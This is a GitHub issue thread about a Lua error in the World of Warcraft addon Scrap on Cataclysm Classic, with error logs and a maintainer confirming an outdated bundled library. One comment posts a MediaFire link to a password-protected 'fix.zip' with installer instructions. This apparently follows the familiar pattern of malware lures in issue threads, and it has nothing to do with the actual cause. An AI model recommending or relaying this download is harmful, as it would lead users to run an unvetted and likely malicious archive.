### ISSUE TITLE
Error: attempt to call field 'IsDressableItemByID' (a boolean value)

### ISSUE THREAD

**Issue by ThaDanus** [Jaliborc/Scrap#260]
**Which software were you running?**
 - Addon version name: Scrap 11.0.5
 - Client used: Cataclysm Classic 4.4.0 (56014)

**Have you read the changelog?**
Yes

**Please describe the bug.**
When opening the inventory, I get this error:
```
Message: Interface/AddOns/Scrap/libs/ItemSearch-1.3-8/API.lua:89: attempt to call field 'IsDressableItemByID' (a boolean value)
Time: Mon Aug 26 17:05:50 2024
Count: 10
Stack: Interface/AddOns/Scrap/libs/ItemSearch-1.3-8/API.lua:89: attempt to call field 'IsDressableItemByID' (a boolean value)
```

Locals: 

**Please describe how to reproduce it.**
Update to 11.0.5
Open bags

**Any Screenshots?**
n/a

**Error Logs are Important!**
Type `/console scriptErrors 1` in the chat and reload the game. If an error window appears when reproducing the bug, please write here the first message (labelled 1/Many) that appeared. **:warning: By default, the last error message is shown, not the first!** You need to navigate back to the first error.

Result:
```
Message: Interface/AddOns/Scrap/libs/ItemSearch-1.3-8/API.lua:89: attempt to call field 'IsDressableItemByID' (a boolean value)
Time: Mon Aug 26 17:10:17 2024
Count: 2
Stack: Interface/AddOns/Scrap/libs/ItemSearch-1.3-8/API.lua:89: attempt to call field 'IsDressableItemByID' (a boolean value)
```

Locals:

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Road-block** [comment]
```lua
23x Scrap/libs/ItemSearch-1.3-8/API.lua:89: attempt to call field 'IsDressableItemByID' (a boolean value)
[string "@Scrap/libs/ItemSearch-1.3-8/API.lua"]:89: in function `IsUncollected'
[string "@Scrap/addons/main/main.lua"]:152: in function `IsFiltered'
[string "@Scrap/addons/main/main.lua"]:69: in function `IsJunk'
[string "@Scrap/addons/main/main.lua"]:97: in function <Scrap/addons/main/main.lua:85>
```
One more datapoint for **Cataclysm Classic**

11.0.5 and 10.0.6 both error, 11.0.4 rollback works like the ThaDanus mentioned earlier.

**Comment by Road-block** [comment]
The problem is the packages are not pulling in the latest version of https://github.com/Jaliborc/C_Everywhere

**Comment by Jaliborc** [comment]
Good catch! It was out of date indeed!
